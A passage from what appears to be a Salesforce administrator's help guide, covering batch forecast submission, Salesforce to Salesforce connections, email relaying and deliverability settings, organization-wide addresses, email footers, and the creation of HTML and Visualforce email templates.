1. From Setup, click Customize > Forecasts (Customizable) > Batch Submit.
2. Choose the appropriate forecast period.
3. Select the users that have forecasts you want to submit and click Add to add them to the list of Selected Users for

Batch Submit. Select more than one at a time using CTRL+click.
4. Click Submit.
5. Click OK.

See Also:
Setting Up Customizable Forecasting

1593

Submitting Customizable Forecasts in BatchesConfiguring Customizable Forecasts



ENABLING BUSINESS NETWORKS FOR COLLABORATION
ACROSS ORGANIZATIONS

Enabling Salesforce to Salesforce
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Modify All Data”To enable Salesforce to Salesforce:

Warning:  Enabling Salesforce to Salesforce is not reversible, however, you control the information you share and
the connections you share with. You can stop sharing or modify sharing settings at any time. By enabling Salesforce
to Salesforce, you agree to allow salesforce.com to process updates to information in your organization that is shared
with other organizations. Salesforce to Salesforce allows you to share your data with third-party recipients, and those
recipients may in turn use Salesforce to Salesforce to share your data with further third-party recipients unknown to
you. You are responsible for ensuring that appropriate contractual or other legal arrangements are in place between
you and your recipients to limit those recipients' use and disclosure of your shared data.

To enable Salesforce to Salesforce:

1. From Setup, click Customize > Salesforce to Salesforce > Settings.
2. Click Edit.
3. Select Enable.
4. Click Save.

When you enable Salesforce to Salesforce, a new user named “Connection User” is created. This user does not count towards
the number of used licenses for your organization, and is not included in any user management view.

When your business partner updates a shared record, the Last Modified By field on the record in your organization displays
Connection User, allowing you to easily track all changes made by your business partners.

The Connection User is automatically assigned to the Partner Network profile. The Partner Network profile cannot be modified
and is not included in any profile management view.

After Salesforce to Salesforce is enabled:

1. Create a permission set with the “Manage Connections” permission enabled and the Connection tab set to Visible, and
assign the permission set to users who will be working with Salesforce to Salesforce connections.

We also recommend giving the “Manage Queues” user permission to all users with the “Manage Connections” user
permission. This lets users create and manage queues for connections without needing assistance from an administrator.

2. Configure Salesforce to Salesforce settings, such as communication templates for sending invitations to your business
partners.

1594

Enabling Salesforce to SalesforceEnabling Business Networks for Collaboration Across
Organizations



3. Add the External Sharing related list to page layouts for the appropriate profiles.

Note:  This related list can be made available to all users, not just users with the “Manage Connections” permission.

4. Optionally, create custom list views on the External Sharing related list and give access to the appropriate users, so that
they can view and accept shared records. To view records shared by a connection, you must either have the “Manage
Connections” permission or have access to the list view.

5. Optionally add the Received Connection Name and Sent Connection Name columns to the related lists on the page layouts
of the desired objects.

6. Create and manage connections with your business partners.

See Also:
Salesforce to Salesforce Overview
Tips for Using Salesforce to Salesforce
Finding Out if Your Partners Use Salesforce

Configuring Salesforce to Salesforce
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Modify All Data”To configure Salesforce to Salesforce:

You can configure Salesforce to Salesforce to use communication templates for interacting with your business partners. In
addition, you can configure the email address and name used on the templates. To configure any of these settings:

1. From Setup, click Customize > Salesforce to Salesforce > Settings.
2. Click Edit and modify the following settings:

DescriptionSetting

The email address from which all Salesforce to Salesforce communication
templates are sent, for example, “partner@acme.com.” Salesforce sends the

From Email Address

emails automatically, but they appear to your contacts as if they were sent from
this email address. If a contact responds to a communication template, the
response is sent to this address.

The name that will be associated with the “From” Email Address, for example,
“Acme Channel Manager”.

From Email Name

Used to send invitations.Invitation Template

Used to notify a business partner that you have deactivated the connection.Deactivation Template
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DescriptionSetting

Used to notify a business partner that you have accepted an invitation.Accept Invitation Template

Used to notify a business partner that you have not accepted an invitation.Reject Invitation Template

Used to notify business partners of changes to an active connection profile.Update Connection Profile
Template

3. Click Save.

See Also:
Salesforce to Salesforce Overview
Inviting Business Partners to Connect using Salesforce to Salesforce
Managing Connections
Sharing Records Using Salesforce to Salesforce

SETTING UP SALESFORCE-INTEGRATED EMAIL

Setting Up Email Relaying
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Modify All Data”To configure email relaying:

Email relaying is using an email server to send email that did not originate on the email server. Companies set up email relaying
to:

• Route all email through their own email servers to avoid the appearance of email spoofing by Salesforce. Email spoofing
is the forging of email headers to make messages appear as if they came from someone other than the original sender.

• Store copies of all email as required by government regulations in various industries.

• Apply existing content filters that scan messages for data and content that is not approved to be sent out through company
email.

• Run outbound email through antivirus software before sending it to customers.

• Append data such as company-wide disclaimers at the bottom of email messages.

You can set up email relaying for Salesforce-generated email by configuring Salesforce to automatically route email through
your company's Simple Mail Transfer Protocol (SMTP) server. Contact salesforce.com to enable email relaying for your
organization.
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Warning: If you plan to activate both bounce management and email relaying, check with your email administrator
to ensure that your organization's email server allows the relaying of email sent from salesforce.com; otherwise, the
email you send from Salesforce may not get delivered. For more information on bounce management, see Configuring
Deliverability Settings on page 1600.

To set up email relaying:

1. From Setup, click Email Administration > Email Relay Activation.
2. Configure the following settings:

DescriptionSetting

The host name or IP address of your company's SMTP
server. Obtain this information from your email
administrator.

Email Host

Important:  If you plan to use Transport Layer
Security (TLS) with this connection, enter the host
name instead of the IP address. TLS requires the
host name for verifying certificates.

For host names, use the following format:

<mail server>.<domain>.<domain extension>

For example:

mail.acme.com

The port number of your company's SMTP server. Obtain
this information from your email administrator. Email

Port

relaying is supported on port numbers 25, 587, 10025, and
11025.

Specifies whether Salesforce uses TLS for SMTP sessions.
Select one of the following options:

TLS Setting

• Preferred (default): If the remote server offers TLS,
Salesforce upgrades the current SMTP session to use
TLS. If TLS is unavailable, Salesforce continues the
session without TLS.

• Required: Salesforce continues the session only if the
remote server offers TLS. If TLS is unavailable,
Salesforce terminates the session without delivering the
email.

• Preferred Verify: If the remote server offers TLS,
Salesforce upgrades the current SMTP session to use
TLS. Before the session initiates, Salesforce verifies the
certificate is signed by a valid certificate authority, and
that the common name presented in the certificate
matches the domain or mail exchange of the current
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DescriptionSetting

connection. If TLS is available but the certificate is not
signed or the common name does not match, Salesforce
disconnects the session and does not deliver the email.
If TLS is unavailable, Salesforce continues the session
without TLS.

• Required Verify: Salesforce continues the session
only if the remote server offers TLS, the certificate is
signed by a valid certificate authority, and the common
name presented in the certificate matches the domain or
mail exchange to which Salesforce is connected. If any
of these criteria are not met, Salesforce terminates the
session without delivering the email.

Specifies whether to restrict the email relaying functionality
to certain domains. If you select this option, enter the names

Restrict Relay to Domains

of those domains separated by commas in the text field
below. (The asterisk (*) wildcard is allowed; for example,
*.subdomains.com matches john@aco.subdomains.com
and john@bco.subdomains.com (but not
john@subdomains.com)). This causes Salesforce to route
email to your company's SMTP server only if the email is
addressed to one of the listed domains. If you select the
checkbox but do not list any domains, Salesforce routes all
email to your company's SMTP server.

Enables email relaying for your organization. If you deselect
this checkbox, Salesforce keeps the email relay configuration
but does not route email to your company's email server.

Active

3. Click Save.

Salesforce recommends sending a test message each time you change the email relay configuration.

See Also:
Testing Deliverability
Enabling Compliance BCC Emails
Configuring Deliverability Settings
Organization-Wide Addresses
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Enabling Email to Salesforce
Available in: All Editions except Database.com

User Permissions Needed

“Modify All Data”To enable or disable Email to Salesforce:

If you use a company-provided or third-party email account, you can use Email to Salesforce to assign emails to leads, contacts,
opportunities, and other records in Salesforce. When composing, forwarding, or replying to email, simply enter your Email
to Salesforce address in the BCC field or any recipient field. Salesforce receives a copy of the email and, depending on your
configuration, adds it to either the Activity History related list of the matching records or to the My Unresolved Items page,
where you can manually assign it.

To enable Email to Salesforce for your organization:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select Email Administration > Email to Salesforce.
• If you clicked My Settings, select Email > My Email to Salesforce.

3. Click Edit.
4. Select the Active checkbox.
5. Optionally, select the Advanced Email Security Settings checkbox to configure Email to Salesforce to verify the

legitimacy of the sending server before processing a message. Email to Salesforce uses the following authentication protocols
to verify the sender's legitimacy:

• SPF
• SenderId
• DomainKeys

If the sending server passes at least one of these protocols and does not fail any protocols, Email to Salesforce accepts the
email. If the server fails a protocol or does not support any of the protocols, Email to Salesforce ignores the email.

Tip:  Before selecting the Advanced Email Security Settings checkbox, ensure that the senders you
expect to use Email to Salesforce support at least one of the authentication protocols listed above.

6. Click Save.
7. Optionally, click Send Notification Email to notify users that Email to Salesforce is activated, or click Skip This Step.
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After enabling Email to Salesforce, Salesforce creates a unique Email to Salesforce address for each user. To view their unique
Email to Salesforce address and customize their settings, users can go to the My Email to Salesforce page in their personal
settings. For more information, see Guidelines on Using Email to Salesforce on page 1264.

See Also:
Guidelines on Using Email to Salesforce

Enabling Compliance BCC Emails
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable or disable compliance BCC email:

If your organization evaluates all outbound email messages for compliance, you can enable compliance BCC emails to
automatically send a hidden copy of each outbound email message to an email address you specify. Enabling compliance BCC
emails prevents users from editing the BCC field on any email and disables their Automatic Bcc setting under My Email
Settings.

To enable compliance BCC emails for your organization:

1. From Setup, click Email Administration > Compliance BCC Email.
2. Select the Enable checkbox.
3. Enter your compliance email address.
4. Click Save.

Note: The BCC email is automatically sent to the address you specify for any emails your users send, excluding
system emails such as password reset or import completion notifications.

Configuring Deliverability Settings
Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To configure email deliverability:

To improve the deliverability of email you send from Salesforce, configure your organization's email deliverability settings.
Email deliverability is the likelihood of a company’s or individual’s email reaching its intended recipient. This likelihood is
adversely affected by:
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Bounced email

Email that is addressed to an invalid recipient and returned to the sender. If a sender sends several email messages that
bounce, the email server might slow or block the delivery of all email from that sender.

Noncompliant email

Email that does not comply with a recipient's email security framework, such as the Sender Policy Framework (SPF),
which verifies that the From address in an email message is not forged.

Warning: If you plan to activate both bounce management and email relaying, check with your email administrator
to ensure that your organization's email server allows the relaying of email sent from salesforce.com; otherwise, the
email you send from Salesforce may not get delivered. For information on email relaying, see Setting Up Email
Relaying on page 1596.

To configure the email deliverability settings for your organization:

1. From Setup, click Email Administration > Deliverability.
2. To control the type of email your organization sends, change the Access level in the Access to Send Email

section. You may not be able to edit the Access level if salesforce.com has restricted your organization’s ability to
change this setting.

• No access>: Prevents all outbound email to and from users.
• System email only: Allows only automatically generated emails, such as new user and password reset emails.
• All email>: Allows all types of outbound email. Default for new, non-sandbox organizations.

Tip: The System email only setting is especially useful for controlling email sent from sandboxes so that
testing and development work doesn’t send test emails to your users.

• Newly created sandboxes default to System email only.
• Sandboxes created before ’Spring 13 default to All email.

3. Select the Activate bounce management checkbox to help ensure that the email addresses you have for your contacts,
leads, and person accounts are correct, and that the email your users send to those addresses is not impeded due to excessive
email bounces.

When bounce management is activated and a user sends an email to a contact, lead, or person account with an invalid
email address, Salesforce displays an alert next to that email address and prevents users from sending email to the address
until it is updated or confirmed. Also, the email bounces to Salesforce instead of the sender's personal email account.

Tip:  Use the Bounced Contacts and Bounced Leads standard reports to view a list of email all addresses that
have bounced email. The report includes the reason the email was bounced, the date the bounce occurred, and
the contact, lead, or person account that bounced the email.

4. Select the Show bounce alert next to all instances of the email address checkbox to configure
Salesforce to search all lead, contact, and person account records for instances of any email address that bounces an email
and to display a bounce alert next to each instance. If you do not select this option, Salesforce only displays the bounce
alert on the record from which the email was originally sent.

5. Select the Return bounced email to sender checkbox to configure Salesforce to send a copy of the bounced email
header to the sender. If you do not select this option, only Salesforce receives the bounced email header. In either case, for
security purposes Salesforce does not return the body of the bounced email to the sender. This option applies to all users
in your organization and cannot be enabled per user or per email.
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6. Select the Enable compliance with standard email security mechanisms checkbox to automatically modify
the envelope From address of every email you send from Salesforce to comply with email security frameworks that your
recipients might implement, such as SPF.

Many recipient email systems enforce SPF to verify whether an email is legitimate. SPF checks the envelope From address
of an inbound email to verify legitimacy. If this feature is enabled, Salesforce changes the envelope From address to a
salesforce.com email address to verify the sender's legitimacy. The header From address remains set to the sender's email
address.

Note:  For more information on SPF, see www.openspf.org.

7. Select the Enable Sender ID compliance checkbox to comply with the Sender ID framework. This will automatically
populate the Sender field in the envelope of every email you send from Salesforce with no-reply@salesforce.com.
This enables receiving mail servers using the Sender ID email authentication protocol to verify the sender of an email by
examining the Sender and From headers of an inbound email through a DNS lookup. All replies will still be delivered
to the sender's email address. If you do not select this checkbox, the Sender field is set to null and email delivery fails
when a recipient email system performs a Sender ID check.

Note:

• We recommend enabling Sender ID compliance only if you have recipients using the Sender ID email
authentication protocol, which isn’t widely used.

• If you enable Sender ID compliance, the recipient's email client (not Salesforce) may append the phrase “Sent
on behalf of” to the From field of email received from Salesforce.

• For more information on Sender ID, see www.microsoft.com/mscorp/safety/technologies/senderid/default.mspx.

8. If you want Salesforce to send users a status email when their mass emails are complete, select Notify sender when
mass email completes.

9. To specify how Salesforce uses the Transport Layer Security (TLS) protocol for secure email communication for SMTP
sessions, choose one of the following:

• Preferred (default): If the remote server offers TLS, Salesforce upgrades the current SMTP session to use TLS. If
TLS is unavailable, Salesforce continues the session without TLS.

• Required: Salesforce continues the session only if the remote server offers TLS. If TLS is unavailable, Salesforce
terminates the session without delivering the email.

• Preferred Verify: If the remote server offers TLS, Salesforce upgrades the current SMTP session to use TLS.
Before the session initiates, Salesforce verifies the certificate is signed by a valid certificate authority, and that the
common name presented in the certificate matches the domain or mail exchange of the current connection. If TLS is
available but the certificate is not signed or the common name does not match, Salesforce disconnects the session and
does not deliver the email. If TLS is unavailable, Salesforce continues the session without TLS.

• Required Verify: Salesforce continues the session only if the remote server offers TLS, the certificate is signed by
a valid certificate authority, and the common name presented in the certificate matches the domain or mail exchange
to which Salesforce is connected. If any of these criteria are not met, Salesforce terminates the session without delivering
the email.

Note:  If you select a setting other than Preferred (the default setting), select Restrict TLS to these
domains and specify a comma-separated domain list. The asterisk (*) wildcard is allowed; for example,
*.subdomains.com matches john@aco.subdomains.com and john@bco.subdomains.com (but not
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john@subdomains.com). If you don't specify domains, Salesforce uses the TLS setting you specify for all outbound
emails, which may result in emails not being delivered.

10. Click Save.

See Also:
Sending Email
Enabling Compliance BCC Emails
Setting Up Email Relaying
Testing Deliverability

Organization-Wide Addresses
Available in: All Editions except Database.com

User Permissions Needed

“Modify All Data”To configure organization-wide addresses:

If your organization requires users to share a common email alias, you can define a list of organization-wide addresses for each
user profile. Organization-wide addresses define a common email address that a user profile can use. When sending email
from Salesforce, users with these profiles can choose a different From address than the email address they have defined. Replies
are delivered to the organization-wide address.

For example, assume your organization has several users under a single Support Profile. A Support Profile can be associated
with an email address called support@acme.com and a Display Name of Acme Support. When Support Profile users
send an outbound email through Salesforce, they can choose to have their From address appear as support@acme.com
instead of their own Salesforce email address.

The highlighted sections in the following image represents the changes to the From address and Display Name that the
recipient of an email might see:

After an organization-wide address is verified, it is available as a From address when sending an email or an email alert.

To display the list of defined organization-wide addresses, from Setup, click Email Administration > Organization-Wide
Addresses. From this page you can:

• Click Add to create a new organization-wide address.

• Click Edit to change any of the fields associated with the alias:
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◊ Display Name is the word or phrase users who receive your email will see as the sender of the email.

◊ Email Address is the email address that is used when sending an outbound email.

◊ Allowed Profiles lists the profiles which use the email address as an alias.

◊ Status shows the current stage of verification. When you add a new organization-wide address, it must be verified
as a valid email address before becoming available for use. If you have not received your verification email, click Resend
to have another one sent.

• Click Del to remove the alias.

Note: You cannot use an organization-wide address to send a mass email or a Stay-in-Touch request. You cannot
delete or change an organization-wide email address if it is used by an email alert.

See Also:
Managing Organization-Wide Email Footers

Defining Organization-Wide Addresses

Available in: All Editions except Database.com

User Permissions Needed

“Modify All Data”To configure organization-wide addresses:

To define an organization-wide address for a user profile:

1. From Setup, click Email Administration > Organization-Wide Addresses.
2. Click Add.
3. Enter a Display Name. The display name identifies how your name appears on outbound emails. The maximum length

is 300 characters.
4. Enter the Email Address you would like to use as an alias. This can be any standard email address. The maximum length

is 270 characters.
5. Select Allow All Profiles to Use this From Address if you want every user profile in your organization to

be able to use the new From address. Otherwise, select Allow Only Selected Profiles to Use this From
Address to choose from existing user profiles.

6. Click Save to save your changes, or Save and New to define another organization-wide address. A verification email is
sent to the new email address which includes a link that you click to complete the verification process. The From address
will not be available for use until you access the email and click this link. Click Cancel to return to the previous page
without saving.

Note: You cannot delete or change an organization-wide email address if it is used by an email alert.
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To use an organization-wide address, send an email or set up an email alert, and choose your organization-wide address from
the drop-down list.

Managing Organization-Wide Email Footers
Available in: All Editions except Database.com

User Permissions Needed

“Modify All Data”To create and edit email footers:

You can create personalized footers or disclaimers that appear at the bottom of all outgoing email messages sent from Salesforce
or the API. You can create a separate email footer for each encoding and choose default footers for single and mass email.
The defaults are used when no footer matches an outgoing email's encoding.

Creating Email Footers
1. From Setup, click Email Administration > Email Footers.
2. Click New.
3. Enter a name.
4. Choose if you want the footer to be available for single emails, mass emails, or both.
5. Select the email encoding. The email encoding determines which emails the footer appears on. For each encoding you can

have one active single email footer and one active mass email footer.
6. Enter the text of the footer.

Note:  Footers are text only; HTML tags aren't rendered. Maximum is 32 KB.

Editing Email Footers
1. From Setup, click Email Administration > Email Footers.
2. To edit an email footer, either click Edit next to a footer or on the footer detail page.
3. Edit the footer information and click Save.

Choosing Default Email Footers
You can choose one default footer for single email and one for mass email. These defaults are used when no footer matches
an outgoing email's encoding.

1. From Setup, click Email Administration > Email Footers.
2. Using Default for Single Mail and Default for Mass Mail, select default footers.
3. Click Save.

Note:  If you don't click Save, your default footer choice is lost when you leave the page.
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Deactivating Email Footers
You can deactivate an email footer without deleting it.

1. From Setup, click Email Administration > Email Footers.
2. Uncheck the Single and Mass checkboxes next to the footer.
3. Click Save.

Testing Deliverability
Available in: All Editions except Database.com

User Permissions Needed

“Modify All Data”To test email deliverability:

Salesforce sends email from 52 different IP addresses. If your organization blocks any of these IP addresses, users might not
receive all email sent from Salesforce.

To verify your organization can receive email from every Salesforce IP address:

1. From Setup, click Email Administration > Test Deliverability.
2. Enter your business email address.
3. Click Send. Salesforce simultaneously sends a test message from all 52 IP addresses to your business email address. Each

test message specifies the IP address from which it was sent.
4. Check your business email account to make sure it received all 52 test messages.

If you received less than 52 test messages, your organization's email administrator must whitelist the Salesforce IP ranges on
your organization's email server. Whitelisting an IP address allows the email server to receive email from an IP address that
might otherwise be blocked. The Salesforce IP ranges are:

• 96.43.144.64 to 96.43.144.65

• 96.43.148.64 to 96.43.148.65

• 182.50.78.64 to 182.50.78.79

• 204.14.232.64 to 204.14.232.79

• 204.14.234.64 to 204.14.234.79

Note: If your organization activates email relaying, your email administrator only needs to whitelist the IP addresses
Salesforce uses for email relaying (96.43.144.65, 96.43.148.65, 182.50.78.65, 204.14.232.65, and 204.14.234.65).
For information on email relaying, see Setting Up Email Relaying on page 1596.

Salesforce.com maintains separate IP addresses for inbound and outbound email. The IP addresses used for outbound email
don’t accept inbound email connections.

See Also:
Configuring Deliverability Settings
Enabling Compliance BCC Emails
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Deleting Email Attachments Sent as Links
Available in: All Editions except Database.com

User Permissions Needed

“Modify All Data”To delete email attachments sent as links:

You can find and delete attachments sent as links. Recipients who subsequently click on the attachment link see a message
asking them to contact the email sender to view the attachment. You can search only within your organization’s email retention
period (typically 30 days, but contact salesforce.com Support for your organization’s details).

To find and delete email attachments sent as links:

1. From Setup, click Email Administration > Attachments Sent as Links
2. Enter either of these:

• File name (optional), username, and date range:

◊ Optionally, attachment file name, including the file extension (for example, ThisYearResults.pdf). You can
use wildcards (for example, ThisYearRes would find ThisYearResults.pdf).

◊ Sender's username
◊ Date range during which the email was sent

• Attachment URL: Click the attachment link (.html) in the email to open it in a browser, and copy and paste the
URL.

3. Click Search.

• Search results show up to 100 matching entries.
• If the attachment was sent using mass email, search results show one entry for every 100 emails sent—delete one of

these entries to delete the attachment.

4. In Search Results, click Del next to the attachment you want to delete. Recipients who subsequently click on the attachment
link see a message asking them to contact the email sender to view the attachment.

Note:  You cannot recover deleted attachments from the Recycle Bin.
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Monitoring the Mass Email Queue
Available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Mass Email”To view your mass email or cancel your pending mass email:

“Modify All Data”To view all mass email or cancel pending mass email in your
organization:

Use the mass email queue to view the status of scheduled mass emails and cancel mass emails if necessary.

To view the mass emails you have scheduled, go to your personal settings and select Email > My Mass Emails. If you have
permission to view all mass emails in your organization, from Setup click Monitoring > Mass Email.

From these pages, you can:

• Click Cancel to cancel a pending mass email.

• Click Stop to stop a mass email that Salesforce is in the process of sending.

• Click Del to delete the record of a sent or canceled mass email from the queue.

• Click the name of the mass email to view details about an individual mass email.

The mass email queue shows the number of recipients that the mass email was addressed to and sent to. These numbers may
differ because:

• The mass email would cause your organization to exceed its daily mass email limit. Salesforce does not send the message
to any of the intended recipients in this case.

• One or more selected recipients opted out of receiving mass email after the mass email was scheduled but before it was
processed.

• One or more selected recipient email addresses were removed from the contact or lead after the mass email was scheduled
but before it was processed.

• The user who sent the mass email was deactivated after the mass email was scheduled but before it was processed. Salesforce
does not send mass emails scheduled by a user who is deactivated.

See Also:
Sending Mass Email
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WORKING WITH MAIL MERGE TEMPLATES

Managing Mail Merge Templates
Available in: All Editions except Database.com

User Permissions Needed

“Manage Public Templates”To upload mail merge templates:

“Manage Public Templates”To edit mail merge templates:

Mail merge templates define the content of a form letter or other mail merge document. They include variables called merge
fields where data from your records—for example a contact’s name and address—displays in the generated document.

As an administrator, you’re responsible for building mail merge templates in Microsoft Word and uploading them to Salesforce
to make them available for your users. See the following topics:

• Creating New Mail Merge Templates explains how to build a new mail merge template from a blank Word document.

• Modifying Existing Mail Merge Templates explains how to download sample templates and modify them to meet your
unique business needs.

• Uploading Mail Merge Templates to Salesforce explains how to upload completed mail merge templates to Salesforce.

Tip: Download sample mail merge templates to help you get started.

See Also:
Mail Merge Overview
Merge Fields for Mail Merge Templates
Sending Single Mail Merge Documents
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Creating Visualforce Email Templates

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Mass email not available in: Personal, Contact Manager, and Group Editions

User Permissions Needed

“Customize Application”To create or change Visualforce email templates:

“Manage Public Templates”To create or change public email template folders:

To create a Visualforce email template:

1. Do one of the following:

• If you have permission to edit public templates, from Setup, click Communication Templates > Email Templates.
• If you don’t have permission to edit public templates, at the top of any Salesforce page, click the down arrow next to

your name. From the menu under your name, select Setup or My Settings—whichever one appears. Then from the
left side of the page, click Email > My Templates.

2. Click New Template.
3. Choose Visualforce and click Next.

You can’t send a mass email using a Visualforce email template.

4. Choose a folder in which to store the template.
5. Select the Available For Use checkbox if you would like this template offered to users when sending an email.
6. Enter an Email Template Name.
7. If necessary, change the Template Unique Name. This is a unique name used to refer to the component when using

the Force.com API. In managed packages, this unique name prevents naming conflicts on package installations. This name
can contain only underscores and alphanumeric characters, and must be unique in your organization. It must begin with
a letter, not include spaces, not end with an underscore, and not contain two consecutive underscores. With the Template
Unique Name field, a developer can change certain components’ names in a managed package and the changes are reflected
in a subscriber’s organization.

8. Select an Encoding setting to determine the character set for the template.
9. Enter a Description of the template. Both template name and description are for your internal use only.
10. Enter the subject line for your template in Email Subject.
11. In the Recipient Type drop-down list, select the type of recipient that will receive the email template.
12. In the Related To Type drop-down list, optionally select the object from which the template will retrieve merge field

data.
13. Click Save.
14. On the Viewing Email Templates page, click Edit Template.
15. Enter markup text for your Visualforce email template.
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Note:  If you are including an image, we recommend uploading it to the Documents tab so that you can reference
the copy of the image that is on our server. For example:

<apex:image id="Logo" value="https://na7.salesforce.com/servlet/servlet.ImageServer?
id=015D0000000Dpwc&oid=00DD0000000FHaG&lastMod=127057656800"
height="64" width="64"/>

16. Click Version Settings  to specify the version of Visualforce and the API used with this email template. If your organization
has installed managed packages from the AppExchange, you can also specify which version of each managed package to
use with this email template. Generally, you should use the default value for all versions. This associates the email template
with the most recent version of Visualforce, the API, as well as each managed package. You can specify an older version
of Visualforce and the API to maintain specific behavior. You can specify an older version of a managed package if you
want to access components or functionality that differs from the most recent package version.

17. Click Save to save your changes and view the details of the template, or click Quick Save to save your changes and continue
editing your template. Your Visualforce markup must be valid before you can save your template.

Note:  The maximum size of a Visualforce email template is 1 MB.

You can’t send a mass email using a Visualforce email template. The {!Receiving_User.field_name} and
{!Sending_User.field_name} merge fields work only for mass email and are unavailable in Visualforce email
templates.

Tip:

• Click Send Test and Verify Merge Fields to view a sample of the template populated with data from records you
choose and send a test email. If the email template includes encrypted data, keep in mind that the data displays
encrypted within the generated email and when viewing the Visualforce template page. It doesn't display in plain
text for security purposes.

• To translate Visualforce email templates based on recipients' or related objects' languages, use the
<messaging:emailTemplate> tag's language attribute (valid values: Salesforce supported language keys,
for example, “en-US”). The language attribute accepts merge fields from the email template's recipientType
and relatedToType attributes. You create custom language fields for use in the merge fields. The Translation
Workbench is required to translate email templates.

See Also:
Creating HTML Email Templates
Creating Custom HTML Email Templates
Creating Text Email Templates
Developer's Guide: Visualforce Developer's Guide
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Creating Custom HTML Email Templates

Available in: All Editions except Database.com

Mass email not available in: Personal, Contact Manager, and Group Editions

HTML and Visualforce email templates not available in: Personal Edition

User Permissions Needed

“Edit HTML Templates”To create or change custom HTML email templates:

“Manage Public Templates”To create or change public email template folders:

To create a custom HTML email template:

1. Do one of the following:

• If you have permission to edit public templates, from Setup, click Communication Templates > Email Templates.
• If you don’t have permission to edit public templates, at the top of any Salesforce page, click the down arrow next to

your name. From the menu under your name, select Setup or My Settings—whichever one appears. Then from the
left side of the page, click Email > My Templates.

2. Click New Template.
3. Choose Custom (without using Letterhead) and click Next.
4. Choose a folder in which to store the template.
5. Select the Available For Use checkbox if you would like this template offered to users when sending an email.
6. Enter an Email Template Name.
7. If necessary, change the Template Unique Name. This is a unique name used to refer to the component when using

the Force.com API. In managed packages, this unique name prevents naming conflicts on package installations. This name
can contain only underscores and alphanumeric characters, and must be unique in your organization. It must begin with
a letter, not include spaces, not end with an underscore, and not contain two consecutive underscores. With the Template
Unique Name field, a developer can change certain components’ names in a managed package and the changes are reflected
in a subscriber’s organization.

8. Select an Encoding setting to determine the character set for the template.
9. Enter a Description of the template. Both template name and description are for your internal use only. The description

is used as the title of any email activities you log when sending mass email.
10. Click Next.
11. Enter the Subject to appear in the email you send.
12. Enter the HTML source text to appear in the message you send. This should include all the HTML tags.

Note:  If you are including an image, we recommend uploading it to the Documents tab so that you can reference
the copy of the image that is on our server. For example:

<img src="https://na2.salesforce.com/servlet/servlet.ImageServer?
id=015D0000000Dpwc&oid=00DD0000000FHaG&lastMod=1270576568000" alt="Company Logo"
height="64" width="64"/>
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13. Optionally, enter merge fields in the template subject and body. These fields will be replaced with information from your
lead, contact, account, opportunity, case, or solution when you send an email.

14. Click Next.
15. Optionally, enter the text-only version of your email or click Copy text from HTML version to automatically paste the

text from your HTML version without the HTML tags. The text-only version is available to recipients who are unable
to view HTML emails.

Warning: Salesforce.com recommends that you leave the text-only version blank. If you leave it blank, Salesforce
automatically creates the text-only content based on the current HTML version. If you don't leave the text-only
version blank and instead manually enter content, subsequent edits to the HTML version aren't reflected in the
text-only version.

16. Click Save.

Tip: Click Send Test and Verify Merge Fields to view a sample of the template populated with data from records
you choose and send a test email.

Note:  Users cannot modify the content of a custom HTML template when they select it for use in an email.

See Also:
Creating Visualforce Email Templates
Cloning Email Templates
Creating HTML Email Templates
Creating Visualforce Email Templates
Creating Letterheads
Adding Images to Email Templates

Creating HTML Email Templates

Available in: All Editions except Database.com

Mass email not available in: Personal, Contact Manager, and Group Editions

HTML and Visualforce email templates not available in: Personal Edition

User Permissions Needed

“Edit HTML Templates”To create or change HTML email templates:

“Manage Public Templates”To create or change public email template folders:

To create an HTML email template:
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1. Do one of the following:

• If you have permission to edit public templates, from Setup, click Communication Templates > Email Templates.
• If you don’t have permission to edit public templates, at the top of any Salesforce page, click the down arrow next to

your name. From the menu under your name, select Setup or My Settings—whichever one appears. Then from the
left side of the page, click Email > My Templates.

2. Click New Template.
3. Choose HTML (using Letterhead) and click Next.
4. Choose a folder in which to store the template.
5. Select the Available For Use checkbox if you would like this template offered to users when sending an email.
6. Enter an Email Template Name.
7. If necessary, change the Template Unique Name. This is a unique name used to refer to the component when using

the Force.com API. In managed packages, this unique name prevents naming conflicts on package installations. This name
can contain only underscores and alphanumeric characters, and must be unique in your organization. It must begin with
a letter, not include spaces, not end with an underscore, and not contain two consecutive underscores. With the Template
Unique Name field, a developer can change certain components’ names in a managed package and the changes are reflected
in a subscriber’s organization.

8. Select a Letterhead. The letterhead decides the logo, page color, and text settings of your email.
9. Select the Email Layout. The email layout determines the columns and page layout of the message text. Click View

Email Layout Options to see samples.
10. Select an Encoding setting to determine the character set for the template.
11. Enter a Description of the template. Both template name and description are for your internal use only. The description

is used as the title of any email activities you log when sending mass email.
12. Click Next.
13. Enter the Subject to appear in the email you send.
14. Enter the text to appear in the message you send. Click any section and begin entering text for your message. To prevent

users from editing a section when using this template, click the padlock icon.
15. Change the style of your text by selecting the text and using the format toolbar. See Using the Format Toolbar on page

1288 for instructions on the format toolbar.
16. Optionally, enter merge fields in the template subject and body. These fields will be replaced with information from your

lead, contact, account, opportunity, case, or solution when you send an email.
17. Click Next.
18. Optionally, enter the text-only version of your email or click Copy text from HTML version to automatically paste the

text from your HTML version without the HTML tags. The text-only version is available to recipients who are unable
to view HTML emails.

Warning: Salesforce.com recommends that you leave the text-only version blank. If you leave it blank, Salesforce
automatically creates the text-only content based on the current HTML version. If you don't leave the text-only
version blank and instead manually enter content, subsequent edits to the HTML version aren't reflected in the
text-only version.

19. Click Save.
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Tip: Click Send Test and Verify Merge Fields to view a sample of the template populated with data from records
you choose and send a test email.

See Also:
Creating Custom HTML Email Templates
Creating Visualforce Email Templates
Adding Images to Email Templates
Creating Letterheads

Merge Fields for Email Templates

Available in: All Editions except Database.com

Mass email not available in: Personal, Contact Manager, and Group Editions

HTML and Visualforce email templates not available in: Personal Edition

A merge field is a field you can put in an email template, mail merge template, custom link, or formula to incorporate values
from a record.

You can use merge fields in the subject and body of custom HTML templates.

Syntax and Formatting

When you insert a merge field in an email template, the syntax consists of an open curly brace and exclamation point, followed
